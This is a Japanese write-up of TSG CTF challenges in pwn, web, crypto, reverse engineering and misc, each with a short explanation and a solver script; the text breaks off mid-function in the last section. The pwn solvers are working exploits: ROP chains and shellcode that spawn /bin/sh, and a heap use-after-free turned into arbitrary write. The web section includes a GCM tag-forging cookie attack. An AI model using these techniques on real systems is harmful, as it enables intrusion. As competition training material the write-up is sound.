# TSG CTF Writeup *暫定版。いつかちゃんと書き直します!* ## [pwn] converter `10101010` みたいなものを変換すると 6 byte になってくれる。それを使って flag を読み出す。 ```py print("10101010" * 21 + "000000020" * 3) ``` ## [pwn] converter2 異常な入力を入れると -1 が返ることを利用して、3 番目の入力の末尾まで `utf8_bin` を戻した後に 3 番目の入力を伸ばす。 ```python= from ctf import * BIN_NAME = "./chall" LOCAL = not (("REMOTE" in os.environ) or ("REMOTE" in sys.argv)) chall = ELF(BIN_NAME) if LOCAL: stream = process(BIN_NAME) else: stream = remote("nc 40004") payload = "00010000" stream.sendlineafter("> ", "10101010" * 22 + "".join([hex(ord(c))[2:].zfill(8) for c in payload])) stream.sendlineafter("> ", "00010000") pause() stream.sendlineafter("> ", "00010000" * 31) stream.interactive() ``` ## [pwn] sloader `rwx` 領域でコードが動いているので、shellcode が書き込める。`scanf("%s", buf)` は `rbp` から書き込むアドレスを計算しているため、`pop rbp` ガジェットを使うと AAW ができる。scanf 終了後のアドレスに shellcode を直置きした。 ```python= from ctf import * BIN_NAME = "./chall" REMOTE_LIBC_PATH = "./lib/libc.so.6" LOCAL = not (("REMOTE" in os.environ) or ("REMOTE" in sys.argv)) chall = ELF(BIN_NAME) if LOCAL: stream = process(["./sloader", BIN_NAME]) else: stream = remote("nc 40001") chall.base = 0x1400000 RWX_POS = 0x1401000 SHELLCODE_POS = RWX_POS + 0x19f # next addr of scanf("%s", buf) stream.sendline( b"A" * 40 + \ p64(next(chall.gadget("pop rbp; ret;"))) + \ p64(SHELLCODE_POS + 0x20) + \ p64(chall.base + 0x1184) ) stream.sendline(nasm( """ mov rax, 59 lea rdi, [rel s_binsh] xor rsi, rsi xor rdx, rdx syscall s_binsh: db "/bin/sh", 0 """, bits=64 )) stream.interactive() ``` ## [pwn] tinyfs ディレクトリを消去した際に子ディレクトリの cache を消去していないので、消したはずのディレクトリにアクセスできる。そこから file の UAF を使ってアドレスリーク、AAR, AAW が実現できる。RIP は environ -> ROP で制御。 ```python= from math import e from ctf import * BIN_NAME = "./chall_patched" REMOTE_LIBC_PATH = "./lib/libc.so.6" LOCAL = not (("REMOTE" in os.environ) or ("REMOTE" in sys.argv)) chall = ELF(BIN_NAME) if LOCAL: stream = process(BIN_NAME) else: stream = remote("nc 31415") def prompt(cmd): msg = stream.recvuntil("$ ", drop=True) if msg: print(msg) print("$", cmd) stream.sendline(cmd) def make_directory(path): prompt(f'mkdir {path}') def make_file(path): prompt(f'touch {path}') def enter(path): prompt(f'cd {path}') def leave(): prompt('cd ..') def delete_item(arg): prompt(f'rm {arg}') def list_items(): prompt('ls') return stream.recvuntil(b"\n$ ", drop=True, lookahead=True) def print_file_content(file_name): prompt(f'cat {file_name}') return stream.recvuntil(b"\n$ ", drop=True, lookahead=True) def write_file_content(file_name, content, do_return=True): prompt(f'mod {file_name}') if do_return: stream.sendlineafter("> ", content) else: stream.sendafter("> ", content) make_directory("d1") enter("d1") make_file("f1") make_file("f2") make_file("f3") make_file("f4") make_file("f5") make_file("f6") make_file("f7") make_file("f8") make_directory("d2") enter("/d1/d2") # make cache enter("/") delete_item("d1") enter("/d1/d2") leave() def reverse_shift(h2: int, shift: int): recovered = 0 for i in range(0, h2.bit_length())[::-1]: recovered *= 2 recovered ^= (h2 >> i & 1) ^ (recovered >> shift & 1) assert (recovered ^ (recovered >> shift)) == h2 return recovered main_arena_addr = u64(print_file_content("f1")) heap_base = u64(print_file_content("f8")) << 0xc print(f'{hex(main_arena_addr)=}') print(f'{hex(heap_base)=}') libc = ELF(REMOTE_LIBC_PATH) libc.base = main_arena_addr - 0x1f6ce0 write_file_content("f2", p64(heap_base >> 12 ^ (heap_base + 0x110))) enter("/") make_file("dummy1") make_file("tcache") counter = 0 def aaw(addr, content): global counter write_file_content("tcache", b"\x00" * 8 + p64(addr)) filename = f"aaw{counter}" make_file(filename) write_file_content(filename, content) counter += 1 root_obj_addr = heap_base + 0x2a0 # aaw(root_obj + 0x130, p64(libc.symbol("environ", True))) aaw(root_obj_addr + 0x130, p64(libc.symbol("environ", True))) print(f'{hex(root_obj_addr)=}') print(f'{hex(libc.symbol("environ", True))=}') listed = list_items() environ_addr = u64(listed.split(b"/\n")[0]) print(listed, f'{hex(environ_addr)=}') return_addr = environ_addr-0x128 aaw( return_addr, b'\x00' * 8 + \ p64(next(libc.gadget("ret;"))) + \ p64(next(libc.gadget("pop rdi; ret;"))) + \ p64(next(libc.search(b"/bin/sh\x00"))) + \ p64(libc.symbol("system", True)) ) stream.interactive() ``` ## [pwn] BABA PWN GAME レベル名に `hard.y\x00...\x00` みたいな入力をするとステージ外に出られる。そこから、`*` を壁にめり込ませた後に `SINK` にし、壁を破壊することを目指す。 - O と @ を動かして S is YOU に - S を動かして I is YOU に - I で I を押してステージ内に侵入し、下に大量にある O を片付ける - これをせずに O is YOU とすると、自分が壁にめり込みゲームオーバーになる - 外にある I や内側の O の位置に気をつけながら、O を押して * から壁までの通り道にある X を破壊 - O is You にする - * を 6 の前にをめり込ませる - 外にいる I を動かして * is STOP and SINK に - 中にいる O を動かし、* がめり込んでいる壁に押し込む - SINK の発火条件がそのマスが update されることなので - 壁が壊れるので、6 に到達できるようになる なんか I を押してゴールにたどり着けるらしい。ゴール前の壁が二重になっていても解けるやり方ということで…… ```python= from ctf import * BIN_NAME = "./baba_pwn_game" # REMOTE_LIBC_PATH = "./lib/libc.so.6" LOCAL = not (("REMOTE" in os.environ) or ("REMOTE" in sys.argv)) chall = ELF(BIN_NAME) if LOCAL: stream = process(BIN_NAME) else: stream = remote("nc 10906") stream.sendlineafter("(easy/hard)", b'hard.y'.ljust(64, b'\x00')) # S is PUSH stream.sendline("wdddddddssssssassssssdaaaaaaasdddddd") # S is YOU stream.sendline("wds") # I is YOU stream.sendline("sdsdddssssssaassssssaawdddswddsas") # I inside stream.sendline("sddsdssssss") # DESTROY Os stream.sendline("sssssssddddddddsdddddddddddddawddaaasaaawdddddddaaaaaaasaaaaaaaaawddddddddddddddddaasaasaaaaaaaaaaa") # Adjust outside Is stream.sendline("ddddddddddddwwdddddsdd") # Clear up Xs stream.sendline("wwasssssaaaaawwwsaawwdwaaaaaaaddddddsswaassssaaaawwawdwassdssawwwdwaaaadddssssddddddddwddsaasawdwaaaaaasawwwawdddssssawdddddddwadsdddwaaaaaaaaaaasawwwdwaaaaaaaaaaw") # O is YOU stream.sendline("ssassssssdddds") # Preapre * stream.sendline("dddddddddddddaaawaaaaaaaaaadddwwddddddddddddddwwddddsddwaaaaaaaaaaaaaaaaaaasawdwa") # * is STOP and SINC stream.sendline("dsddddddddsssddsddwddwwaaawwwwwdssdssdwwwwwssssssaawwwwwsssaadsssss") # Destroy WALL stream.sendline("aaaaaaawwwwwawwwaaaaaawwwaasaaawawaaa") # WIN! stream.interactive() ``` ## [web] brain string 以外の型も入るため、`{"0": "a", "1000": "a", "length":"1001"}` のような入力を入れればいい。 ## [web] dance GCM の tag は先頭からの一致で判定され、長さのチェックは自前でやらないといけない。ありがとう theoremoon 先生、ありがとう kurenaif 先生。 https://twitter.com/fwarashi/status/1570307626847862784 ```python= import base64 import requests from urllib.parse import unquote, quote from ctf import * sess = requests.session() base = "" sess.post(base + "index.php", data={ "auth": "guest" }) auth_cookie = sess.cookies["auth"] auth = base64.b64decode(unquote(auth_cookie)) forged_auth = xor(xor(auth, b'guest'), b'admin') auth_cookie = quote(base64.b64encode(forged_auth)) for tag in range(256): sess.cookies["auth"] = auth_cookie sess.cookies["tag"] = quote(base64.b64encode(bytes([tag]))) res = sess.get("").content.decode() if "rewrote" in res: continue print(res) ``` ## [cry] Unique Flag Flag の隣接する 2 文字の候補が絞られるため、その情報を用いて木を探索する。First blood を狙っていたので、スクリプトでは枝狩りや flag 候補の判定がかなり雑である。 ```python= from output import * cur_flag = list(b"TSGCTF{") def solve(cur_flag): x = pow(cur_flag[-1], e, N) for next_c in range(20, 128): if next_c in cur_flag[7:]: continue y = pow(next_c, e, N) if (x * y % N) in clues: nxt_flag = cur_flag + [next_c] print(bytes(nxt_flag)) if next_c == ord("}"): print(bytes(nxt_flag)) input() else: solve(nxt_flag) solve(cur_flag) ``` ## [cry] Complicated Function `m * (m + 2**1023) ≒ N` となるような `m` を考えると、`p` が `[m - (2**512-1)//5, p - (2**512-1)//5 + 2**506)` の範囲に収まることが分かった。これは Partial Key Exposure Attack で解くことができる。bit 数がかなり大きいので、6 bit をグリッドサーチし、それぞれについて 500 bit の PKE Attack をした。以下のスクリプトではグリッドサーチする値を素数性を用いて削減しているため少々煩雑になっている。 ```sh= #!/bin/bash for i in {0..5} do sage solve2.sage $i 6 & done ``` ```python= import sys import time from Crypto.Util.number import * from itertools import product from tqdm import tqdm from output import N ub, lb = 2**1024, 2**1023 while ub - lb > 1: mid = (ub + lb) // 2 if N < mid * (mid + 2**1023): ub = mid else: lb = mid n = N p_msb = ub - (2**512-1)//5 UNKNOWN_BIT = 506 SEARCH_BITS = 6 SMALL_ROOTS_BETA = 0.34 SMALL_ROOTS_EPSILON = 0.0055 # (p_msb // base * base) + x*base + y def get_ys(base): sieve = [True] * base for p, _ in factor(base): for i in range(0, len(sieve), p): sieve[i] = False return [i for i in range(base) if sieve[i]] min_len = 2**30 # inf min_arg = (-1, []) primes = [2, 3, 5, 7, 11] for ps in product(primes): base_factor = 1 for p in ps: base_factor *= p base = (2**SEARCH_BITS // base_factor + 1) * base_factor ys = get_ys(base) if len(ys) < min_len: min_len, min_arg = len(ys), (base, ys) base, ys = min_arg p_lower = p_msb // base * base p_upper = p_msb + (2**UNKNOWN_BIT) x_bound = (p_upper - p_lower + base - 1) // base assert x_bound <= 2**(UNKNOWN_BIT-SEARCH_BITS) # p = p_lower + x*base + y # gcd(p_lower + x*base + y, base) == 1 # <=> gcd(y, base) == 1 def solve(y, file): PR.<x> = PolynomialRing(Zmod(n)) f = p_lower + x * base + y f = f.monic() x_cand = f.small_roots(X=x_bound, beta=SMALL_ROOTS_BETA, epsilon=SMALL_ROOTS_EPSILON) print(x_cand) for cand in x_cand: p = int(p_lower + cand * base + y) print(p, file=file, flush=True) if n % p == 0: print("found", file=file, flush=True) ind = int(sys.argv[1]) num = int(sys.argv[2]) start = time.time() file = open(f'res_{ind}_{num}.txt', "w") # file = sys.stdout for y in tqdm([y for i, y in enumerate(ys) if i % num == ind], file=file): solve(y, file) file.flush() ``` ## [cry] streamer flag のそれぞれの箇所の文字種が限られているので、key の各要素としてありえる要素が限られる。ある程度絞った後は全探索が可能。 ```python= import base64 import hashlib from itertools import product from re import A import re import string import tqdm from output import * def gen_flag(flag_content): flag_hash = hashlib.md5(flag_content).digest() return b"TSGCTF{"+flag_content+b"@"+base64.b64encode(flag_hash)+b"}" FLAG_CONTENT_LEN = 271 assert len(cipher) == len(gen_flag(b"A" * FLAG_CONTENT_LEN)) pattern = re.compile("[a-zA-Z0-9!-/:-?\[-`|~]+") alphabet = [i for i in range(128) if re.fullmatch(pattern, chr(i))] flag_char_candidates = \ [[c] for c in b"TSGCTF{"] + \ [alphabet for _ in range(FLAG_CONTENT_LEN)] + \ [[ord("@")]] + \ [list((string.ascii_lowercase + string.ascii_uppercase + string.digits + "+/").encode())] * 22 + \ [[c] for c in b"==}"] test_flag = gen_flag(b"A" * FLAG_CONTENT_LEN) assert all([c in cands for cands, c in zip(flag_char_candidates, test_flag)]) assert len(flag_char_candidates) == flag_length paireds = [*zip(flag_char_candidates, cipher)] key_candidates = [] for i in range(16): pairs = [paired for ind, paired in enumerate(paireds) if ind % 16 == i] # print(pairs) s = set(range(256)) for plain_cands, c in pairs: key_cands = sorted([cand ^ c for cand in plain_cands]) s = s.intersection(key_cands) key_candidates.append(list(s)) print(key_candidates) for key in tqdm.tqdm([*product(*key_candidates)]): plain = "".join([chr(key[i % 16] ^ c) for i, c in enumerate(cipher)]).encode() content = plain[7:][:FLAG_CONTENT_LEN] # input([plain, gen_flag(content)]) if gen_flag(content) != plain: continue print(plain.decode()) ``` ## [cry] RANDOM SEED RANDOM 与える seed を適切に調整することで、`seed(s:=randrange())` が短いサイクル長を持つようにしたい。そうすると、関数 `r` からの出力を数種類に絞ることができるためである。ランダムな関数が長さ `4` 以下のサイクルを持たない確率は、`((20231104*9-1)/(20231104*9))^(20231104*9*4)` を計算すると、1% 程度であると分かる(サイクルの性質から、これよりは少し起こりやすいと思われる)。なので、これを計算する。 ```python= import random import sys from tqdm import tqdm for i in tqdm(range(20231104, 20231104 * 10)): if i % num != ind: continue seed = i for j in range(3): random.seed(seed) seed = random.randrange(20231104, 20231104 * 10) if i == seed: print(i, j) ``` すると、`seed = 47852311` としたときに `47852311 -> 89794361 -> 66523739 -> 47852311 -> ...` と循環するということを発見できた。これを用いて、それぞれの文字について 3 種類の暗号化結果が得られるまで結果を集め、そこからそれぞれの文字を求めた。 ```python= from ctf import * BIN_NAME = ["python", "./main.py"] LOCAL = not (("REMOTE" in os.environ) or ("REMOTE" in sys.argv)) SEED = 47852311 random.seed(SEED) def step(): seed = random.randrange(20231104, 20231104 * 10) random.seed(seed) return seed step() step() assert step() == SEED r_cands = [step(), step(), step()] print(r_cands) collected = [] while True: if LOCAL: stream = process(BIN_NAME) else: stream = remote("nc 10960") stream.sendlineafter(": ", SEED) collected.append(stream.recvlineafter(": ")) flag_len = len(collected[0]) if all([len(set(chars)) == len(r_cands) for chars in zip(*collected)]): break print(collected) cs = string.printable[:-6].encode() candidates_to_char = { tuple(sorted([cs[(cs.index(c) + r) % len(cs)] for r in r_cands])): c for c in cs } print(candidates_to_char) res = [candidates_to_char[tuple(sorted(set(chars)))] for chars in zip(*collected)] print(bytes(res)) ``` ## [cry] Learning with Exploitation LWE を実装しているが、ランダムであるべきベクトルが 0, 1 になっている。これはナップサック暗号のようにして解けるのではないかと考えたため、これを実装した。スケーリングは雰囲気で行った。 ```python= from random import choice from sage.stats.distributions.discrete_gaussian_integer import DiscreteGaussianDistributionIntegerSampler from sage.crypto.lwe import LWE, samples, balance_sample from sage.misc.prandom import randrange from ctf import * p = 0xfffffffffffffffffffffffffffffffeffffffffffffffff F = GF(p) d = 100 n = 10 q = p // (2 ** 64) # not prime D = DiscreteGaussianDistributionIntegerSampler(q // d // 6) # six sigma from output import public_key, ciphertext A, T = public_key A = matrix(F, A) T = vector(F, T) res = b'' for U, v in tqdm(ciphertext): U = vector(F, U) INF1 = int(sqrt(p)) INF2 = p lattice = [] for i, row in enumerate(public_key[0]): cost = [0] * d cost[i] = INF1 * 2 lattice.append([*row, *cost, 0]) lattice.append([*U, *([INF1] * d), INF2]) for i in range(n): mods = [0] * n mods[i] = p lattice.append([*mods, *([0] * d), 0]) mat = matrix(ZZ, lattice) for row in mat.LLL(): if row[-1] == 0: continue assert all([item == 0 for item in row[:n]]) choices = row[n:][:d] assert all([abs(item) == INF1 for item in choices]) r = vector([1 if item != INF1 else 0 for item in choices]) # print(r * matrix(A), U) # assert r * matrix(A) == U m = (v - r * vector(T)) // q res += long_to_bytes(int(m)) print(res) ``` ## [rev] beginners_rev_2023 "Correct" や "Wrong" といったシンボルから処理の場所をたどると、以下のような見た目の関数にたどり着く。なお、デコンパイルは Ghidra によるものである。 ```c= extern char result_buf[0x200]; void check(void) { int iVar1; int *expanded_key; void *input_buf; char *_Str; longlong len; undefined8 uVar2; longlong _j; undefined8 uVar3; longlong i; undefined8 in_R9; undefined auStack_258 [32]; char key [16]; char input [512]; ulonglong local_18; ulonglong *buf; ulonglong *nxt_buf; expanded_key = (int *)malloc(0x408); *(undefined8 *)expanded_key = 0; strcpy(key, "2023TTSSGG2023!"); _j = -1; do { len = _j + 1; i = _j + 1; _j = len; } while (key[i] != '\0'); expand_key(expanded_key,(int)len,key); input_buf = malloc(0x201); uVar2 = 0; uVar3 = 0x201; memset(input_buf,0,0x201); printf("Flag> "); scanf("%s",input_buf,0x201,in_R9); memset(input,0,0x201); _j = 2; i = 2; buf = (ulonglong *)((longlong)input_buf + 0x18); do { buf[-3] = buf[-3] ^ buf[-3] >> 0xc; buf[-2] = buf[-2] ^ buf[-2] >> 0xc; buf[-1] = buf[-1] ^ buf[-1] >> 0xc; *buf = *buf ^ *buf >> 0xc; buf[1] = buf[1] ^ buf[1] >> 0xc; buf[2] = buf[2] ^ buf[2] >> 0xc; // ... buf[0x13] = buf[0x13] >> 0xc ^ buf[0x13]; buf[0x14] = buf[0x14] >> 0xc ^ buf[0x14]; nxt_buf = buf + 0x20; buf[0x15] = buf[0x15] >> 0xc ^ buf[0x15]; buf[0x16] = buf[0x16] >> 0xc ^ buf[0x16]; buf[0x17] = buf[0x17] >> 0xc ^ buf[0x17]; buf[0x18] = buf[0x18] >> 0xc ^ buf[0x18]; buf[0x19] = buf[0x19] >> 0xc ^ buf[0x19]; buf[0x1a] = buf[0x1a] >> 0xc ^ buf[0x1a]; buf[0x1b] = buf[0x1b] >> 0xc ^ buf[0x1b]; buf[0x1c] = buf[0x1c] >> 0xc ^ buf[0x1c]; i = i + -1; buf = nxt_buf; } while (i != 0); FUN_1400010e0((uint *)expanded_key,nxt_buf,(longlong)input_buf,(longlong)input); buf = (ulonglong *)(input + 0x18); do { buf[-3] = buf[-3] ^ buf[-3] >> 0xc; buf[-2] = buf[-2] ^ buf[-2] >> 0xc; buf[-1] = buf[-1] ^ buf[-1] >> 0xc; *buf = *buf ^ *buf >> 0xc; buf[1] = buf[1] ^ buf[1] >> 0xc; buf[2] = buf[2] ^ buf[2] >> 0xc; // ... buf[0x1b] = buf[0x1b] >> 0xc ^ buf[0x1b]; buf[0x1c] = buf[0x1c] >> 0xc ^ buf[0x1c]; _j = _j + -1; buf = buf + 0x20; } while (_j != 0); iVar1 = memcmp(input,&result_buf,0x200); _Str = "Correct!!!"; if (iVar1 != 0) { _Str = "Wrong..."; } puts(_Str); } ``` また、この関数内で呼ばれている関数は以下のような見た目になっている。 ```c= void encryption(uint *key, byte *plain, byte *cipher) { uint uVar1; uint uVar2; uint uVar3; ulonglong uVar4; byte *pbVar5; longlong lVar6; ulonglong uVar7; uint uVar8; byte *pbVar9; uVar4 = (ulonglong)*key; uVar7 = (ulonglong)key[1]; lVar6 = 0x20; pbVar5 = cipher + 2; pbVar9 = plain + 2; do { uVar3 = (int)uVar4 + 1U & 0xff; uVar1 = key[(ulonglong)uVar3 + 2]; uVar8 = uVar1 + (int)uVar7 & 0xff; uVar2 = key[(ulonglong)uVar8 + 2]; key[(ulonglong)uVar3 + 2] = uVar2; key[(ulonglong)uVar8 + 2] = uVar1; pbVar9[(longlong)(cipher + (-2 - (longlong)plain))] = *(byte *)(key + (ulonglong)(uVar2 + uVar1 & 0xff) + 2) ^ pbVar9[-2]; uVar3 = uVar3 + 1 & 0xff; uVar1 = key[(ulonglong)uVar3 + 2]; uVar8 = uVar8 + uVar1 & 0xff; uVar2 = key[(ulonglong)uVar8 + 2]; key[(ulonglong)uVar3 + 2] = uVar2; key[(ulonglong)uVar8 + 2] = uVar1; pbVar5[-1] = *(byte *)(key + (ulonglong)(uVar2 + uVar1 & 0xff) + 2) ^ pbVar9[-1]; // ...... uVar3 = uVar3 + 1 & 0xff; uVar1 = key[(ulonglong)uVar3 + 2]; uVar8 = uVar8 + uVar1 & 0xff; uVar2 = key[(ulonglong)uVar8 + 2]; key[(ulonglong)uVar3 + 2] = uVar2; key[(ulonglong)uVar8 + 2] = uVar1; pbVar5[0xc] = *(byte *)(key + (ulonglong)(uVar2 + uVar1 & 0xff) + 2) ^ pbVar9[0xc]; uVar3 = uVar3 + 1 & 0xff; uVar4 = (ulonglong)uVar3; uVar1 = key[uVar4 + 2]; uVar8 = uVar8 + uVar1 & 0xff; uVar7 = (ulonglong)uVar8; uVar2 = key[uVar7 + 2]; key[uVar4 + 2] = uVar2; key[uVar7 + 2] = uVar1; pbVar5[0xd] = *(byte *)(key + (ulonglong)(uVar2 + uVar1 & 0xff) + 2) ^ pbVar9[0xd]; lVar6 = lVar6 + -1; pbVar5 = pbVar5 + 0x10; pbVar9 = pbVar9 + 0x10; } while (lVar6 != 0); key[1] = uVar8; *key = uVar3; return; } ``` この関数何らかの既存の暗号を実装していると推測したため、 ChatGPT に質問をした。すると、`RC4` であることが分かった。 コードは深く読み込まず、上の方で別の関数に渡されている文字列 `2023TTSSGG2023!` を key とし、RC4 に渡される前及び後で各 byte が `c ^ c >> 0xc` により暗号化されていると推測した。この推測に基づき復号化処理を書くと、以下の通りとなった。 ```python= from Crypto.Cipher import ARC4 from Crypto.Hash import SHA256, HMAC from Crypto.Random import get_random_bytes from more_itertools import chunked cipher = ARC4.new(b'2023TTSSGG2023!') scrambled_enc = b'\x07\x56\xe5\x58\x71\x89\x9a\xca\xf0\x67\x03\x2d\x49\xfb\x6e\x86\xc2\xf7\x48\xca\x3c\x43\xdb\x8e\x04\x2a\x56\x4a\x97\x33\xa1\xa2\x07\x83\xf0\x89\x19\x13\x77\xb4\x9f\x7d\x7b\x9c\xdd\x8e\xfd\xad\xb5\xe2\x28\x0e\x06\xaf\xe5\xe3\x86\xc3\x08\xad\xe6\x4c\xde\x63\xa3\x5f\x1e\x96\x34\x7d\x9d\x19\xf5\xc8\x84\x7f\x7b\x62\x2a\x6b\xc1\x28\x3b\x6d\x09\xef\xfc\xcb\xa0\x90\x9a\x3e\x66\xa2\x4e\x06\x90\x2c\x9d\xae\x3c\x99\x40\x53\x4c\x69\x63\xe7\xb9\xa8\xb3\x87\xa5\x97\x98\xfe\x1f\x20\x51\xa7\xae\x0d\x00\xab\x16\x35\x59\x3d\x08\x1b\x1c\x92\xe2\x4f\x1d\x86\xa5\x6e\x0a\x14\x45\x4d\x61\x08\x69\xc3\x12\xa2\xeb\x50\x13\x93\x22\xe2\xc4\x10\xca\x5f\xb2\x0b\xa2\x30\xc8\x54\x91\x3a\x37\xfd\xd2\x10\xab\x5a\xf8\x38\xf3\xd3\xd5\x85\x58\xde\xdf\xc0\xf4\x17\x4e\xf7\x31\x79\xdd\x41\x2f\xb3\x20\xc7\xec\x98\x5e\xae\xf7\xa9\xcb\x27\x13\x72\xfe\xca\x64\xff\x43\x93\x80\x3e\x1e\xe5\x99\xbf\x41\x4b\x9d\x85\x4e\x0f\x99\x94\x57\xe1\x63\xd9\x01\x85\x78\x8a\x06\xfe\x9d\x41\x32\x74\x55\x83\xb2\x85\xe9\x9f\xc6\x2c\x4b\x62\x8f\xbf\x7d\x57\xc8\x76\x3b\x31\x5e\x87\x60\x89\x35\x41\xc1\x52\x6c\xd0\x0b\x7d\xca\x60\x5d\x82\x19\xb0\x96\x5e\x16\xe7\x9b\x2f\x37\x5f\xc9\xc5\xf3\x20\xc3\x45\xcb\x47\xa1\xcc\x79\xe5\xb6\xfb\xd4\x55\xdb\xc1\x35\x9b\x8b\xfa\x38\xd5\xb2\xb5\xe0\x4f\x4d\x6c\x4f\x8c\x0c\x42\xbc\x8e\xb3\x78\x48\xe4\x87\x8e\x34\xa3\x1d\x01\x53\x98\x71\xfa\x8f\x2f\xe3\x7a\x6b\xb9\x1b\xb6\x7e\x34\x7f\xc8\xc4\x6c\xab\x45\x4d\x81\xef\xee\xc3\xd9\xdb\x13\x5b\x63\x90\xfc\x34\x18\x81\xbc\xd1\x18\x48\xbb\x7c\x24\x5b\x56\x2b\x35\x6b\xd7\xf9\xd3\xd5\x2b\xe2\x24\xd8\x50\xf1\xec\xd5\xe6\x29\x55\x66\xf2\xf7\x28\x20\x7d\xf3\x47\x40\x03\x11\x4a\x47\xa5\xb4\x74\x15\x35\xd0\xf0\xe5\x4c\x04\xb5\x59\xfe\xfc\x45\x9d\x3a\xa1\x3f\x1a\xa7\xa8\x51\xe5\x65\xf1\x56\xee\xde\xfc\xc4\x87\xf5\xfa\x79\x31\x07\x0a\x3f\x41\x28\xd1\x59\x17\x4d\x02\xe4\x5a\x22\x3a\xbc\xd2\xcd\x80\xbc\x2a\x49\xf0\x7f\x97\xa1\x90\x59\x01\x8d\x25\x43\xd8\x00\xea\xd8\x4f\xe2\x4e\x2b\x06\xfd\x7e\x16\xa9\x92\xc4\xfd\xb5\x6a\x82\x06\x18\x0c\x0a\xb7\xb8\x29\x8f\x87\x63\x65\x25\xb9\x7a\xd0\x6e\x30\x3c\xf2\xf7\xc2\x30\x86' def reverse_shift(h2: int, shift: int): recovered = 0 for i in range(0, h2.bit_length())[::-1]: recovered *= 2 recovered ^= (h2 >> i & 1) ^ (recovered >> shift & 1) assert (recovered ^ (recovered >> shift)) == h2 return recovered def batch_reverse(b: bytes, shift: int): return b''.join([reverse_shift(int.from_bytes(chunk, "little"), shift).to_bytes(8, "little") for chunk in chunked(b, 8)]) enc = batch_reverse(scrambled_enc, 0xc) scrambled_plain = cipher.decrypt(enc) plain = batch_reverse(scrambled_plain, 0xc) print(plain) ``` ## [rev] T the weakest `strace` でバイナリの挙動を確認すると、再帰的に `/proc/self/fd/3` を用いて自己を呼び出していることが分かった。この際、引数に与えた flag が先頭から 1 文字ずつ判定し、不正解の文字の時点で判定が停止するという挙動をしていることも分かった。 ``` $ strace ./t_the_weakest TSGCTF{A 2>&1 | grep t_the_weakest execve("./t_the_weakest", ["./t_the_weakest", "TSGCTF{A"], 0x7ffe82ea0598 /* 89 vars */) = 0 execve("/proc/self/fd/3", ["./t_the_weakest", "SGCTF{A"], 0x7fffd3acd670 /* 89 vars */) = 0 execve("/proc/self/fd/3", ["./t_the_weakest", "GCTF{A"], 0x7fffe2ece7e0 /* 89 vars */) = 0 execve("/proc/self/fd/3", ["./t_the_weakest", "CTF{A"], 0x7ffd1e6294b0 /* 89 vars */) = 0 execve("/proc/self/fd/3", ["./t_the_weakest", "TF{A"], 0x7ffe5d4bc2f0 /* 89 vars */) = 0 execve("/proc/self/fd/3", ["./t_the_weakest", "F{A"], 0x7ffe4d03b940 /* 89 vars */) = 0 execve("/proc/self/fd/3", ["./t_the_weakest", "{A"], 0x7fff8ec40670 /* 89 vars */) = 0 execve("/proc/self/fd/3", ["./t_the_weakest", "A"], 0x7ffd60532f10 /* 89 vars */) = 0 ``` この挙動を用いて、部分的に求まった flag の次の一文字をブルートフォースし、flag を逐次的に求めていくことを考える。`strace` を用いた手法はデバッガ検知により flag の途中から使えなくなったので、他の手法を用いることとした。 このフラグチェッカーは、`ng` を出力した後に `exit` を呼んでいる。この exit を LD_PRELOAD を用いて置き換え、現時点でのコマンドライン引数を出力する処理を追加した。 ```c= #include<stdlib.h> #include<stdint.h> #include <stdio.h> #include <stdlib.h> void exit(int val) { FILE *f = fopen("/proc/self/cmdline", "r"); char buf[4096]; size_t n = fread(buf, 1, sizeof(buf), f); size_t i, last_null = 0; for (i = 0; i < n - 1; i++) { if (buf[i] == '\0') { last_null = i; } } printf("%s\n", &buf[last_null + 1]); fflush(stdout); fclose(f); _exit(val); } ``` これを用いることで、flag の末尾まで求められた。 ```python= from ctf import * def test_prefix(cur: str): while True: proc = subprocess.run(["./t_the_weakest", cur], env={ "LD_PRELOAD": "./hook.so" }, stdout=subprocess.PIPE) stdout = proc.stdout.decode().split("\n")[1].strip() if 2 <= len(stdout): continue return len(stdout) == 0 alphabet = set(string.printable) - set(" \t\n\x0b\x0c\r") cur = "TSGCTF{" while True: print(f"[+] {cur=}") for c in tqdm(list(alphabet)): nxt = cur + c print(nxt) if not test_prefix(nxt): continue print("\n") cur = nxt break else: break print(cur) ``` ## [misc] Graffiti in the Fog この問題は、点群について分散が少ない方向を二方向見つけてくる問題である。これは主成分分析を行えばよい。 ```python= import numpy as np from sklearn.decomposition import PCA import matplotlib.pyplot as plt A = np.load("problem.npy") pca = PCA() pca.fit(A) data_pca = pca.transform(A) plt.scatter(data_pca[:, 2], data_pca[:, 3], s=0.01) plt.axis("equal") plt.gca().invert_yaxis() plt.show() ``` ![image.png](https://hackmd.io/_uploads/SyfnfgHmp.png) ## [misc] Secret Sequence expanded key が 8 bit のエントロピーしか持たない。 ```python= encrypted_flags = [136566763988814260123977728391695169870, 297854733988125490212154919002758942167, 140286143861115781298750245081274386093, 267780198301748450281498233524628586631, 67891782595602432915140903440966332185, 27833795440965705923198634284529559150, 75239374091619069386173206358307312436, 155895086707931827255209248461881439022, 168571968627802622229088996983467487220, 258118042758062906462047523793633475289] while True: block_length = len(encrypted_flags) nonce = 18639088674531619804203553158 assert block_length <= 2**32 counter = [int.to_bytes((nonce<<32) + i,16,'big') for i in range(0,block_length)] key = secrets.token_bytes(16) encrypted_counter = [twofish_encrypt(i,key) for i in counter] res = b''.join([long_to_bytes(f ^ bytes_to_long(c)) for f, c in zip(encrypted_flags, encrypted_counter)]) if b'TSG' in res: print(res) input() ``` ## [misc] Q??ode QRコードでは、(encoding が特殊でない場合は)データの各 bit が必ずどこかのマスに対応している。よって、各 bit を 0/1 の変数とおき、与えられる画像の各ピクセルの色をそれらの変数の和で表すことで 0-1 整数計画問題として立式できる。よって、これを解けば良い。 ```python= import cv2 import numpy as np from typing import List, Tuple from qrcode.main import QRCode from qrcode.base import rs_blocks from qrcode.constants import ERROR_CORRECT_L def create_img(mask_pattern, data, version=40, error_correction=ERROR_CORRECT_L): qr = QRCode(error_correction=error_correction, version=version, box_size=1, border=1) qr.mask_pattern = mask_pattern qr.data_cache = data qr.make(fit=False) img = qr.make_image() return np.array(img._img, dtype=np.float64)[1:-1, 1:-1] def create_plain_img(mask_pattern, version=40, error_correction=ERROR_CORRECT_L): fill_zero = create_img(mask_pattern, [0x00] * (3706), version, error_correction) fill_one = create_img(mask_pattern, [0xff] * (3706), version, error_correction) eq = fill_zero == fill_one return fill_zero, fill_one, eq def get_byte_limit(version=40, error_correction=ERROR_CORRECT_L): blocks = rs_blocks(version, error_correction) return sum(block.data_count for block in blocks) def get_ec_count(version=40, error_correction=ERROR_CORRECT_L): blocks = rs_blocks(version, error_correction) return 